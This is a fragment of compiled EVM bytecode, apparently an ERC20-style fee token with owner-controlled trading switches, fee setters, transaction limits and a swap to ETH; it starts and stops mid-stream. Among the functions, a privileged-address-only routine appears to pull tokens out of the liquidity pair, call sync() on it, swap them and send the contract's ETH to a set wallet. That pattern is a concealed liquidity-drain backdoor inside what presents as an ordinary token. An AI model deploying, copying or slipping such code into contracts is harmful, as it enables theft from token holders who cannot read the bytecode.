6a57600080fd5b6103e8610f75610da3565b610f7f919061423d565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e0565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151c360289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141bf565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141bf565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141bf565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614300565b61164a9190614300565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d90614380565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141bf565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a906143ec565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e07565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b60606004805461187390614142565b80601f016020809104026020016040519081016040528092919081815260200182805461189f90614142565b80156118ec5780601f106118c1576101008083540402835291602001916118ec565b820191906000526020600020905b8154815290600101906020018083116118cf57829003601f168201915b5050505050905090565b6118fe6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461198d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611984906141bf565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611a1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a149061447e565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad6919061423d565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f906144ea565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b729061453b565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ecc565b8461342191906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f17565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614f8a565b816001815181106135ed576135ec614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150b0565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061453b565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b8114613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b600061402585828601613d61565b925050602061403685828601613feb565b9150509250929050565b60008060006060848603121561405957614058613d13565b5b600061406786828701613d97565b935050602061407886828701613d97565b925050604061408986828701613d97565b9150509250925092565b600080604083850312156140aa576140a9613d13565b5b60006140b885828601613d97565b92505060206140c985828601613d97565b9150509250929050565b600080604083850312156140ea576140e9613d13565b5b60006140f885828601613d61565b925050602061410985828601613d61565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061415a57607f821691505b60208210810361416d5761416c614113565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141a9602083613c6c565b91506141b482614173565b602082019050919050565b600060208201905081810360008301526141d88161419c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061424882613d76565b915061425383613d76565b925082614263576142626141df565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142ca602f83613c6c565b91506142d58261426e565b604082019050919050565b600060208201905081810360008301526142f9816142bd565b9050919050565b600061430b82613d76565b915061431683613d76565b925082820190508082111561432e5761432d61420e565b5b92915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b600061436a601d83613c6c565b915061437582614334565b602082019050919050565b600060208201905081810360008301526143998161435d565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b60006143d6600483613c6c565b91506143e1826143a0565b602082019050919050565b60006020820190508181036000830152614405816143c9565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614468603983613c6c565b91506144738261440c565b604082019050919050565b600060208201905081810360008301526144978161445b565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144d4600f83613c6c565b91506144df8261449e565b602082019050919050565b60006020820190508181036000830152614503816144c7565b9050919050565b600081905092915050565b50565b600061452560008361450a565b915061453082614515565b600082019050919050565b600061454682614518565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b6000614586601d83613c6c565b915061459182614550565b602082019050919050565b600060208201905081810360008301526145b581614579565b9050919050565b60006145c782613d76565b91506145d283613d76565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561460b5761460a61420e565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614672602483613c6c565b915061467d82614616565b604082019050919050565b600060208201905081810360008301526146a181614665565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614704603583613c6c565b915061470f826146a8565b604082019050919050565b60006020820190508181036000830152614733816146f7565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614796603483613c6c565b91506147a18261473a565b604082019050919050565b600060208201905081810360008301526147c581614789565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614828602683613c6c565b9150614833826147cc565b604082019050919050565b600060208201905081810360008301526148578161481b565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614894601b83613c6c565b915061489f8261485e565b602082019050919050565b600060208201905081810360008301526148c381614887565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614926602483613c6c565b9150614931826148ca565b604082019050919050565b6000602082019050818103600083015261495581614919565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149b8602283613c6c565b91506149c38261495c565b604082019050919050565b600060208201905081810360008301526149e7816149ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a4a602583613c6c565b9150614a55826149ee565b604082019050919050565b60006020820190508181036000830152614a7981614a3d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614adc602383613c6c565b9150614ae782614a80565b604082019050919050565b60006020820190508181036000830152614b0b81614acf565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b48601683613c6c565b9150614b5382614b12565b602082019050919050565b60006020820190508181036000830152614b7781614b3b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614bda603583613c6c565b9150614be582614b7e565b604082019050919050565b60006020820190508181036000830152614c0981614bcd565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c6c603683613c6c565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b6000614cad82613d76565b9150614cb883613d76565b925082614cc857614cc76141df565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d2f602483613c6c565b9150614d3a82614cd3565b604082019050919050565b60006020820190508181036000830152614d5e81614d22565b9050919050565b6000614d7082613d76565b9150614d7b83613d76565b9250828203905081811115614d9357614d9261420e565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115614df057808604811115614dcc57614dcb61420e565b5b6001851615614ddb5780820291505b8081029050614de985614d99565b9450614db0565b94509492505050565b600082614e095760019050614ec5565b81614e175760009050614ec5565b8160018114614e2d5760028114614e3757614e66565b6001915050614ec5565b60ff841115614e4957614e4861420e565b5b8360020a915084821115614e6057614e5f61420e565b5b50614ec5565b5060208310610133831016604e8410600b8410161715614e9b5782820a905083811115614e9657614e9561420e565b5b614ec5565b614ea88484846001614da6565b92509050818404811115614ebf57614ebe61420e565b5b81810290505b9392505050565b6000614ed782613d76565b9150614ee283613f73565b9250614f0f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614df9565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614f8481613d4a565b92915050565b600060208284031215614fa057614f9f613d13565b5b6000614fae84828501614f75565b91505092915050565b6000819050919050565b6000614fdc614fd7614fd284614fb7565b613e4f565b613d76565b9050919050565b614fec81614fc1565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61502781613d38565b82525050565b6000615039838361501e565b60208301905092915050565b6000602082019050919050565b600061505d82614ff2565b6150678185614ffd565b93506150728361500e565b8060005b838110156150a357815161508a888261502d565b975061509583615045565b925050600181019050615076565b5085935050505092915050565b600060a0820190506150c56000830188613ec9565b6150d26020830187614fe3565b81810360408301526150e48186615052565b90506150f36060830185613faa565b6151006080830184613ec9